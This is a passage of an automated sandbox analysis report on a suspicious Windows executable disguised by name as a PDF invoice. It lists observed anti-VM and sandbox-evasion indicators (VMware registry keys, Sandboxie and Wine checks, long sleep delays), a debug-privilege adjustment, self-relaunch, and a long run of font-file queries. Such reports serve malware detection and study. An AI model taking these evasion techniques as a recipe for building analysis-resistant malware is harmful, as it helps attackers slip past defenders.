              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess information set: NOGPFAULTERRORBOXJump to behavior

              Malware Analysis System Evasion:

              barindex
              Yara detected AntiVM_3Show sources
              Source: Yara matchFile source: 00000000.00000002.235301021.0000000002F31000.00000004.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: PI_Nov9071011998_ENTRUSTpdf.exe PID: 3476, type: MEMORY
              Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeWindow / User API: threadDelayed 954Jump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe TID: 5464Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe TID: 4084Thread sleep time: -41500s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe TID: 5524Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe TID: 4072Thread sleep count: 59 > 30Jump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe TID: 4072Thread sleep time: -3540000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,1_2_00403D74
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: vmware
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: VMWARE
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: VMware
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000000.00000002.235870525.0000000003224000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_0040317B mov eax, dword ptr fs:[00000030h]1_2_0040317B
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeCode function: 1_2_00402B7C GetProcessHeap,RtlAllocateHeap,1_2_00402B7C
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeProcess created: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe {path}Jump to behavior
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.503468124.00000000018B0000.00000002.00000001.sdmpBinary or memory string: Program Manager
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.503468124.00000000018B0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.503468124.00000000018B0000.00000002.00000001.sdmpBinary or memory string: Progman
              Source: PI_Nov9071011998_ENTRUSTpdf.exe, 00000001.00000002.503468124.00000000018B0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
